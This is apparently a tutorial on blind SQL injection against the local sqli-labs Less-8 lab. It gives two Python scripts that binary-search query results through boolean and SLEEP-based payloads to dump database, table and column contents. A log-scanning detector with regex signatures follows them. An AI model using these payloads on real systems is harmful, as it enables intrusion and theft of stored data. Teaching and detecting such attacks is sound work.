
SQL injection with binary search: boolean-based and time-based blind injection

1. Boolean-based blind injection:

```python
import requests


def binary_search_character(url, query, index, low=32, high=127):
    # Binary search over the printable ASCII range for the character at
    # position `index` of the query result. The oracle is whether the
    # application's success string appears in the response body.
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "
        res = {"id": payload}
        r = requests.get(url, params=res)
        if "You are in.........." in r.text:
            low = mid
        else:
            high = mid - 1
    return chr(low) if low > 32 else ''


# Note: extract_data() is called below but its definition is not included on the page.
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
```

2. Time-based blind injection:

```python
import requests
import time


def binary_search_character(url, query, index, low=32, high=127):
    # Same binary search as above, but the oracle is response latency:
    # the injected IF(...) makes the server SLEEP(2) when the comparison holds.
    while low < high:
        mid = (low + high + 1) // 2
        payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "
        res = {"id": payload}
        start_time = time.time()
        r = requests.get(url, params=res)
        response_time = time.time() - start_time
        if response_time > 1.5:  # a delayed response means the condition held
            low = mid
        else:
            high = mid - 1
    return chr(low) if low > 32 else ''


# Note: extract_data() is called below but its definition is not included on the page.
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'
    database_name = extract_data(url, "SELECT database()")
    print(f"数据库名: {database_name}")
    table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"
    table_names = extract_data(url, table_name_query)
    print(f"表名: {table_names}")
    table_name = table_names.split(',')[0]
    column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"
    column_names = extract_data(url, column_name_query)
    print(f"列名: {column_names}")
    column_name = column_names.split(',')[1]
    data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"
    extracted_values = extract_data(url, data_query)
    print(f"数据: {extracted_values}")
```
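Both oracles above leave a recognisable trail in the web server access log: one request per probe, each carrying an `ASCII(SUBSTRING(...)) >= N` comparison or an `IF(..., SLEEP(n), ...)` expression, and roughly seven probes per recovered character. The following detector is an added example, not code from the original page; the log lines, client addresses and threshold are constructed for illustration.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote_plus

# Constructed access-log sample: one client walking a binary search over a single
# character with both oracle styles, plus one ordinary request from another client.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%27+AND+ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29+%3E%3D+80+--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%27+AND+ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29+%3E%3D+104+--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%27+AND+IF%28ASCII%28SUBSTRING%28%28SELECT+database%28%29%29%2C1%2C1%29%29+%3E%3D+116%2C+SLEEP%282%29%2C+0%29+--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=7 HTTP/1.1" 200 512
"""

# Common log format: client address, request line, status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# Signatures of the two oracles: a comparison against ASCII(SUBSTRING(...)) for the
# boolean variant, and a SLEEP(n) call for the time-based variant.
BOOL_RE = re.compile(r"ascii\s*\(\s*substring\s*\(.*?\)\s*\)\s*(>=|<=|>|<|=)\s*\d+", re.I | re.S)
TIME_RE = re.compile(r"sleep\s*\(\s*\d+", re.I)


def classify(query: str) -> Optional[str]:
    """Decode a raw query string and label it, or return None when it looks benign."""
    q = unquote_plus(query)
    if TIME_RE.search(q):
        return "time-blind"
    if BOOL_RE.search(q):
        return "boolean-blind"
    return None


def scan(log_text: str, min_probes: int = 2) -> dict:
    """Return {ip: Counter(kind -> probes)} for clients whose probe count reaches min_probes."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = m.group("path").partition("?")[2]
        kind = classify(query)
        if kind:
            hits.setdefault(m.group("ip"), Counter())[kind] += 1
    # A single probe can be a false positive; a run of them from one client is the
    # binary-search fingerprint worth alerting on.
    return {ip: c for ip, c in hits.items() if sum(c.values()) >= min_probes}
```

Running `scan(SAMPLE_LOG)` flags only 10.0.0.5, with two boolean probes and one time probe; rate-limiting or blocking on the same signatures, and auditing the application's `id` parameter for parameterised queries, removes the oracle itself.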
